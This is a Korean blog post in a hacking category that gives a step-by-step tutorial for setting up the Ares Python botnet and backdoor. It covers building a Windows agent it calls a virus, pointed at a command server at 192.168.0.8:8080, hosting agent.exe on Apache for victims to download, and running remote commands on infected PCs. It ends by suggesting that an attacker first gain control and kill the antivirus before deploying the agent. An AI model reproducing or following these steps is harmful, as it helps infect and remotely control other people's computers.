본문 바로가기
2. 시스템 해킹 및 모의 해킹

감염 pc를 좀비pc(botnet)로 만드는 도구 ares

by Robert8478 2023. 12. 27.

https://github.com/sweetsoftware/Ares

 

GitHub - sweetsoftware/Ares: Python botnet and backdoor

Python botnet and backdoor. Contribute to sweetsoftware/Ares development by creating an account on GitHub.

github.com

git clone으로 다운받아줍니다.

[설치법]
>pip install -r requirements.txt
>cd server
>./ares.py initdb

(윈도우 에이전트 사용시)
./wine_setup.sh


[사용법]
서버 : ./ares.py runserver -h 0.0.0.0 -p 8080 --threaded
-h 옵션에 해커의 아이피를 넣어줍니다.


서버가 오픈되었으면 해당 아이피와 포트번호로 서버가 오픈됨이 표시됩니다.
해당 주소를 브라우저에 넣고 접속합니다.
비밀번호를 설정합니다.


​그 후 passphrase에 만든 비번을 넣고 접속하면 관리자 페이지로 갑니다.

클라이언트:Ares의 agent 폴더 안의 config.py를 leafpad로 열어줍니다.
세팅을 본인에 맞게 맞춰줍니다. [주소를 자기아이피:8080으로 변경]
그리고 윈도우용 에이전트(바이러스)를 생성해 주어야 하는데요.

agent폴더로 갑니다.
>./builder.py -p Windows --server http://192.168.0.8:8080 -o agent.exe 으로 바이러스 파일을 만듭니다.

그 후 agent.exe 파일을 /var/www/html에 넣어줍니다.
>service apache2 start - 아파치 틀어줍니다.

>그 후 피해자 컴퓨터에서 http://192.168.0.8/agent.exe 하면 다운로드 받아지겠죠
다운 후 실행하면 아레스 서버 브라우저에 세션이 잡힙니다. [백신 끄셔야합니다.]
세션을 클릭하면 검은 창이 뜨는데 해당 감염 컴퓨터의 터미널입니다.

여러개의 컴퓨터를 감염시켰다면 하나하나가 봇넷이 되는것이고
해커의 통제하에 명령어가 작동되게 되겠죠.


명령어는 윈도우 명령어입니다.
help-명령어 종류 확인, url 다운로드,업로드, 파이썬프로그램 실행, 스크린샷 등 많은 작업이 가능합니다.
dir - 디렉터리 확인
systeminfo-시스템 정보 확인
zip hi.zip agent.exe - agent.exe 파일을 hi.zip파일을 만들어 압축안에 넣습니다.
clean-에이전트를 삭제합니다.


많은 백신이 이 바이러스를 감지하기때문에 실로 활용하려면 우선 해킹을 한 후 통제권을 얻은 상태에서
강제로 백신을 종료시키고 이 바이러스를 투입하여 활용할것 같습니다.